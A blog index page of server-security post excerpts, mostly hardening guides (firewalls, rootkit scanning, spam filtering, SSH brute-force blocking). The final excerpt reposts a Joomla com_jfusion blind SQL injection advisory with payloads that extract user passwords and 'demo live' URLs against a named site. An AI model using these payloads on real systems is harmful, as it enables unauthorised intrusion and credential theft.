January 3rd, 2013 |
admin |
This is a nifty new and long-demanded feature in FreeBSD. A port called portaudit provides a system to check if installed ports are listed in a database of published security vulnerabilities. After installation it will update this security database automatically and include its reports in the output of the daily security run. If you [...]
December 22nd, 2012 |
admin |
Spam is a nuisance, and as bloggers, we have all experienced a flood of spam every now and then. Not only is it a pain, but it can slow down your blog and use up your resources. In this post we’ll look at ten ways to combat spam. 1. Install Akismet This is the simple [...]
December 22nd, 2012 |
admin |
1.) Firewall Installation Install a firewall and related tools such as CSF and SIM. These will prevent unauthorized access to your server and brute force attacks. CSF (ConfigServer Firewall) http://www.configserver.com/free/csf/install.txt SIM (System Integrity Monitor) http://www.rfxnetworks.com/sim.php NSIV (Network Socket Inode Validation) http://www.rfxnetworks.com/nsiv.php LES (Linux Environment Security) http://www.rfxnetworks.com/les.php These do not prevent exploits of services which [...]
December 9th, 2012 |
admin |
I. VULNERABILITY WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. [...]
December 3rd, 2012 |
admin |
Securing Your Server Below are some of the steps that can be used to secure your server. Disable identification output for Apache To disable the version output for proftp, SSH into the server and log in as root. At the command prompt type: pico /etc/httpd/conf/httpd.conf Scroll (way) down and change the following line to ServerSignature Off Restart [...]
November 29th, 2012 |
admin |
Here are some basic steps to secure Apache Web Server. IMPORTANT NOTE: These suggestions may vary from server to server; modify the values as per your server configuration. It is up to you to determine if any of the changes suggested here are not compatible with your requirements. 1. Hide the Apache Version number, [...]
October 16th, 2012 |
admin |
Download the gzipped tarball, extract it and run the installation script. Download: # wget http://downloads.rootkit.nl/rkhunter-<version>.tar.gz Note: It doesn’t matter where you save the tarball. Extract: # tar zxf rkhunter-<version>.tar.gz Installation: # cd rkhunter # ./installer.sh (Source: http://www.evolution-security.com/) (Source: http://www.rootkit.nl/articles/rootkit_hunter_faq.html) [...]
October 6th, 2012 |
admin |
8 Install Razor, Pyzor And DCC And Configure SpamAssassin Razor, Pyzor and DCC are spam filters that use a collaborative filtering network. To install them, run apt-get install razor pyzor dcc-client Now we have to tell SpamAssassin to use these three programs. Edit /etc/spamassassin/local.cf so that it looks like this: # This is the right place [...]
September 8th, 2012 |
admin |
Version 1.0 Author: Falko Timme <ft [at] falkotimme [dot] com> Last edited: 02/07/2006 In this HowTo I will show how to install and configure DenyHosts. DenyHosts is a tool that observes login attempts to SSH, and if it finds failed login attempts again and again from the same IP address, DenyHosts blocks further login attempts [...]
August 5th, 2012 |
admin |
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : Blind SQL injection ################################################### Example: http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid Sql code: +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* +and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc… DEMO LIVE: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡ http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡ etc, etc…. I let a script that could [...]